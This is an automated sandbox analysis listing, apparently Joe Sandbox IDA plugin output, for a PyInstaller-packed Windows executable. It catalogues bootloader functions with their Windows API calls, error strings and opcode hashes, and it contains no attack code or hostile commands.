Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-1544818733
Opcode ID: f3fad58325455d3d90bd4a6379e80876c9f26f7da2c623cdf89e881a159dc67d
Instruction ID: 6b2a8aebc80c68f5564dd736ccc4a6158b0ae3d90eeb226d3713d2e402d5bdd6
Opcode Fuzzy Hash: f3fad58325455d3d90bd4a6379e80876c9f26f7da2c623cdf89e881a159dc67d
Instruction Fuzzy Hash: 49B18C61A1D683C1FA64BB21D8912BD6391FF95B84FC00136EE5DC76AAEF2CF5048748

Function 00007FF647778090 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A

SetConsoleCtrlHandler.KERNEL32(00000000,00007FF647773D57), ref: 00007FF6477780DF
GetStartupInfoW.KERNEL32 ref: 00007FF6477780FE

Part of subcall function 00007FF64778AB14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64778AB28

Part of subcall function 00007FF647788730: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647788797

GetCommandLineW.KERNEL32 ref: 00007FF64777819E
CreateProcessW.KERNELBASE ref: 00007FF6477781E0
WaitForSingleObject.KERNEL32 ref: 00007FF6477781F4
GetExitCodeProcess.KERNELBASE ref: 00007FF647778204

Strings

Error creating child process!, xrefs: 00007FF647778210
CreateProcessW, xrefs: 00007FF647778217

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
Instruction ID: f57af56f6768c6470fa9a252ffd502eb97c4189c4698ff0a20a9194aafbcd6e2
Opcode Fuzzy Hash: 08988cee581fa2f1300347ff32b1d9c8d82b1f49edf068ad7517d4b354b7a22a
Instruction Fuzzy Hash: 03413371A0CB81C5EA20BB64E4552AAB361FF953A4F900735EAAD83BE5DF7CD044CB04

Function 00007FF647771050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF6477710F8, 00007FF647771126
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6477710F1
1.3.1, xrefs: 00007FF64777107E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF64777111F
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6477710B4
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF647771249

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: fdd47bc7a99246921f848def4a8063c601e7f2ac33117d7d556e731015f11fda
Instruction ID: 788ca809ae0efccf153f11124ad5c363bd53347da9a8cc6204ee622a5027af7b
Opcode Fuzzy Hash: fdd47bc7a99246921f848def4a8063c601e7f2ac33117d7d556e731015f11fda
Instruction Fuzzy Hash: 5551BA62B0D682C5EA20BB51E4503BA6290FB85BD8FD84535EE4DC7BA5EE3CF505C708

Function 00007FF64778F2D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF64778F66A,?,?,-00000018,00007FF64778B417,?,?,?,00007FF64778B30E,?,?,?,00007FF647786552), ref: 00007FF64778F44C
GetProcAddress.KERNEL32(?,?,?,00007FF64778F66A,?,?,-00000018,00007FF64778B417,?,?,?,00007FF64778B30E,?,?,?,00007FF647786552), ref: 00007FF64778F458

Strings

ext-ms-, xrefs: 00007FF64778F3A9
api-ms-, xrefs: 00007FF64778F396

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction ID: eb5f2bd78b1cb5ad016909dc5eacf470d214809793c07ab415d286a2af44252d
Opcode Fuzzy Hash: d9a2a87bd09a281b138f83e486683d1d3e88d7d7cd724ecba9763c018ac5b270
Instruction Fuzzy Hash: B7410561B1DA02C1FA15FB16E80457A2391BF49BA0FDA4536DD0DD7794EE3CE449C308

Function 00007FF64778C11C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64778C549

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
Instruction ID: 7b9ffe765aa3f55515a358817d05a0e89329837dbde1cad0c923d15891ae2ded
Opcode Fuzzy Hash: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
Instruction Fuzzy Hash: 30C1F222A0C782C1EB60BB55D4442BD7F51EF90B90F9A4271EE4E87791CE7CE84D8709

Function 00007FF647778660 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF647778680
OpenProcessToken.ADVAPI32 ref: 00007FF647778691
GetTokenInformation.KERNELBASE ref: 00007FF6477786B6
GetLastError.KERNEL32 ref: 00007FF6477786C0
GetTokenInformation.KERNELBASE ref: 00007FF647778700
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64777871C
CloseHandle.KERNEL32 ref: 00007FF647778734

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
Instruction ID: 7b616481a352a8042df72610379037832fc54f8dd1199bc0b8e3b6d7f4b44dbd
Opcode Fuzzy Hash: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
Instruction Fuzzy Hash: 65215331A0C642C2EB50BB99F44453AA3A0FF957E0F900235DEAD87AE4DF6CE4448754

Function 00007FF647778980 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF647778660: GetCurrentProcess.KERNEL32 ref: 00007FF647778680
Part of subcall function 00007FF647778660: OpenProcessToken.ADVAPI32 ref: 00007FF647778691
Part of subcall function 00007FF647778660: GetTokenInformation.KERNELBASE ref: 00007FF6477786B6
Part of subcall function 00007FF647778660: GetLastError.KERNEL32 ref: 00007FF6477786C0
Part of subcall function 00007FF647778660: GetTokenInformation.KERNELBASE ref: 00007FF647778700
Part of subcall function 00007FF647778660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF64777871C
Part of subcall function 00007FF647778660: CloseHandle.KERNEL32 ref: 00007FF647778734

LocalFree.KERNEL32(00000000,00007FF647773B6E), ref: 00007FF647778A0C
LocalFree.KERNEL32 ref: 00007FF647778A15

Strings

Security descriptor string length exceeds PATH_MAX!, xrefs: 00007FF647778A23
S-1-3-4, xrefs: 00007FF6477789C1
D:(A;;FA;;;%s), xrefs: 00007FF6477789F7
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6477789E2

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
API String ID: 6828938-1817031585
Opcode ID: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
Instruction ID: 8b04a5a3dc3949492ba0d90060a74647276fba107981e3fe7c925e6b6ac54336
Opcode Fuzzy Hash: 3836f67131116870ca23a087b2c6671b35fb3b3af5dea2168533cc0de3b13045
Instruction Fuzzy Hash: 0C213A71A1DB86C1FA14BB20E8456FA6261EF68780FC44632ED4ED37A6DE3CF5448644

Function 00007FF64778D620 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF64778D60B), ref: 00007FF64778D73C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF64778D60B), ref: 00007FF64778D7C7

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
Instruction ID: a66a5459e5c23c64129d653912540dada0fda50ac5e50ebb0c8d8b5ed7e6c2f6
Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
Instruction Fuzzy Hash: 2E91C172F0C652C9F760BF65D4446BD2BA0EB58B98F958139DE0E97A84DF38E481C308

Function 00007FF64778FDEC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF64778FEDC
_get_daylight.LIBCMT ref: 00007FF64778FEED
_get_daylight.LIBCMT ref: 00007FF64778FEFE
_isindst.LIBCMT ref: 00007FF64778FFC9

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
Instruction ID: a7dc10e4d077f892511bacf74192df23197b58cd366618055b33e2bd3136c0bb
Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
Instruction Fuzzy Hash: 8F51E672F0D212CAFB14FF64D9956BC67A1BB11368F910236DE1E96AE5DF38A402C704

Function 00007FF64777C17C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF64777C18B

Part of subcall function 00007FF64777C34C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF64777C36E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF64777C1A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF64777C20E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF64777C261

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction ID: 84e19a3c6b49aa60a89c8e513101e47f6858ca7f38e4792b36cfb9463e8517e9
Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction Fuzzy Hash: 92315B61E0D603C1FA24BBA4D4523B92B95EF59788FC54435EE0ECB2E7DE2CB408C219

Function 00007FF647785800 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64778582D
CreateFileW.KERNELBASE ref: 00007FF64778586C
CloseHandle.KERNEL32 ref: 00007FF6477858A1

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction ID: a30d9a043f4ad4c0eedc45bb9af4477be013c02debf3eb872ade331cff2a4e9c
Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction Fuzzy Hash: 2041BA22E1C782C3F750BB21D5043A96361FFA47A4F519335EA9C93AD2DF6CA5A08704

Function 00007FF64778A0C0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF64778A0BC), ref: 00007FF64778A0D1
TerminateProcess.KERNEL32(?,?,?,00007FF64778A0BC), ref: 00007FF64778A0DC
ExitProcess.KERNEL32 ref: 00007FF64778A0EB

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
Instruction ID: 3473225b50d46aff8c0a914eac46aed7a6b3c70addfe5e879a3baf1667259afc
Opcode Fuzzy Hash: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
Instruction Fuzzy Hash: 3CD09E50F4D60BC2FB247B719C9907822169FA8B01F925838DD5B963A3DD2DA84D4348

Function 00007FF647778B80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE ref: 00007FF647778BC0

Part of subcall function 00007FF647772C50: MessageBoxW.USER32 ref: 00007FF647772D25

Strings

Security descriptor is not initialized!, xrefs: 00007FF647778B90

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: CreateDirectoryMessage
String ID: Security descriptor is not initialized!
API String ID: 73271072-986317556
Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction ID: 8ce7681559dc066dcf672fcd60be27c9729ca68c33d639123053df9b97d6ac86
Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction Fuzzy Hash: 11E0EDB1A1D706C6EA50BB14E84566922A0FB65754FD01334E95DC63E4EF3CE1198B44

Function 00007FF64778037C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6477803C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6477804B7

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction ID: c54087bf5c941e78f0c2cc9d495e18375070df7735864bf59ea838109e95dfb8
Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction Fuzzy Hash: E151D461B0D281C6FA68BF36D500A7A6681BF45BB4F9A4B34DD6C877C5CE3CE401C628

Function 00007FF64778B21C Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF64778B099,?,?,00000000,00007FF64778B14E), ref: 00007FF64778B28A
GetLastError.KERNEL32(?,?,?,00007FF64778B099,?,?,00000000,00007FF64778B14E), ref: 00007FF64778B294

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction ID: 9332ea01cf42cb850c519046d768e9686e47189d7ed7d3677b22b80a292abc85
Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction Fuzzy Hash: 7321C321B1C6C2C1FA90B7A1D49427D12929F847E4FCA4235DE2EC77F6DE6CE4858309

Function 00007FF64778C7F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF64778C98D), ref: 00007FF64778C840
GetLastError.KERNEL32(?,?,?,?,?,00007FF64778C98D), ref: 00007FF64778C84A

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction ID: a9515d720856ef20da4a6b2c259c9124ed6f693857d5ed023b63a70ff3893668
Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction Fuzzy Hash: 6311BF61A1CB81C1EA10BB25E404069A761EB44BF4F940331EE7D87BE9CF7CD0598744

Function 00007FF6477881BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF647788039), ref: 00007FF6477881DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF647788039), ref: 00007FF6477881F5

Memory Dump Source

